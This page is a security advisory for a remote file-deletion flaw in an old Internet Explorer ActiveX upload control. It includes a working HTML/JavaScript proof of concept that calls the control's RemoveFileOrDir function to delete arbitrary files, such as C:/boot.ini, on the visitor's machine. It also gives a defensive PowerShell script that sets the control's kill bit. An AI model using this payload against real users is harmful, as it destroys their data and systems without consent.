Universal HTTP Image/File Upload ActiveX Remote File Deletion

2009.04.09
Credit: t0pP8uZz
Risk: High
Local: No
Remote: Yes
CWE: CWE-16


CVSS Base Score: 8.8/10
Impact Subscore: 9.2/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: None
Integrity impact: Complete
Availability impact: Complete

<HTML>
<!--
 - Universal HTTP Image Upload (UUploaderSvrD.dll - v6.0.0.35) Remote File Deletion Exploit -
 &&
 - Universal HTTP File Upload (UUploaderSvrD.dll - v6.0.0.35) Remote File Deletion Exploit -

 Author: t0pP8uZz
 Description: ActiveX Remote File Deletion
 Report: Tested on Microsoft Windows XP Pro (SP2) Internet Explorer 7 Fully Patched
 ActiveX: http://image.uploadactivex.com/Download_versal_image_upload_activeX_control.htm

 The Following Material Is For Educational Purposes Only - I will not be held responsible for any illegal actions.

 Internet Explorer can initialise this ActiveX control and take advantage of its functions.
 The RemoveFileOrDir() function is insecure, and can delete a file of any choice.
 The main security threat of this ActiveX control is it being Safe Scripting for Internet Explorer.

 Below you will find some code which makes use of the developer's error, and an attacker can specify a file to delete, i.e. (C:/boot.ini)

 Vendor: Not Reported
-->
<OBJECT ID="fileup" CLASSID="CLSID:04FD48E6-0712-4937-B09E-F3D285B11D82">Could Not Load ActiveX Control.</OBJECT>
<script language="javascript">
/* - Universal HTTP Image Upload (UUploaderSvrD.dll - v6.0.0.35) Remote File Deletion Exploit - */
/* Javascript Code By t0pP8uZz */
var x = "C:/tmp.txt"; /* Full Path To File To Delete OR directory */
var del = true;
var c = 1;
while(del) {
    try {
        fileup.RemoveFileOrDir(x, c);
        del = false;
        alert("File Deleted!");
    } catch(e) {
        c++;
    }
}
</script>
</HTML>
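Because the exposure comes from the control being scriptable from Internet Explorer, a defender can audit the CLSID above and set its kill bit. The PowerShell below is an added example, not code from the advisory or the vendor; the helper names `Get-ControlStatus` and `Set-KillBit` are hypothetical, and it assumes an elevated prompt on the affected host.

```powershell
# Added example (not part of the advisory). Run from an elevated PowerShell prompt.
$Clsid = '{04FD48E6-0712-4937-B09E-F3D285B11D82}'   # CLASSID taken from the PoC above

# Standard COM component categories that let IE script/initialize a control.
$SafeCategories = @{
    '{7DD95801-9882-11CF-9FA9-00AA006C42C4}' = 'SafeForScripting'
    '{7DD95802-9882-11CF-9FA9-00AA006C42C4}' = 'SafeForInitializing'
}
$KillBit = 0x400   # "Compatibility Flags" bit that stops IE instantiating the control
$CompatBases = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

# Hypothetical helper: report registration, server DLL, safety categories, kill-bit state.
function Get-ControlStatus([string]$Id) {
    $root = "Registry::HKEY_CLASSES_ROOT\CLSID\$Id"
    $status = [ordered]@{ Clsid = $Id; Registered = (Test-Path $root); Server = $null }
    if ($status.Registered) {
        $inproc = Get-ItemProperty "$root\InprocServer32" -ErrorAction SilentlyContinue
        if ($inproc) { $status.Server = $inproc.'(default)' }
    }
    foreach ($cat in $SafeCategories.Keys) {
        # Registry markers only; a control can also claim safety via IObjectSafety.
        $status[$SafeCategories[$cat]] = Test-Path "$root\Implemented Categories\$cat"
    }
    # True only when every registry view present on this host carries the kill bit.
    $views = @($CompatBases | Where-Object { Test-Path $_ })
    $killed = @($views | Where-Object {
        [int](Get-ItemProperty "$_\$Id" -ErrorAction SilentlyContinue).'Compatibility Flags' -band $KillBit
    })
    $status.KillBitSet = ($views.Count -gt 0) -and ($killed.Count -eq $views.Count)
    [pscustomobject]$status
}

# Hypothetical helper: set the kill bit in the native and WOW64 registry views.
function Set-KillBit([string]$Id) {
    foreach ($base in $CompatBases) {
        if (-not (Test-Path $base)) { continue }   # e.g. no WOW64 view on 32-bit Windows
        $key = "$base\$Id"
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $old = (Get-ItemProperty $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value ([int]$old -bor $KillBit) -Type DWord
    }
}

Get-ControlStatus $Clsid | Format-List   # state before the change
Set-KillBit $Clsid
Get-ControlStatus $Clsid | Format-List   # state after the change
```

The kill bit only stops Internet Explorer, and other hosts that honour it, from instantiating the control; the DLL itself stays registered and on disk.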

References:

http://xforce.iss.net/xforce/xfdb/41258
http://www.securityfocus.com/bid/28301
http://www.milw0rm.com/exploits/5569



Copyright 2024, cxsecurity.com

 
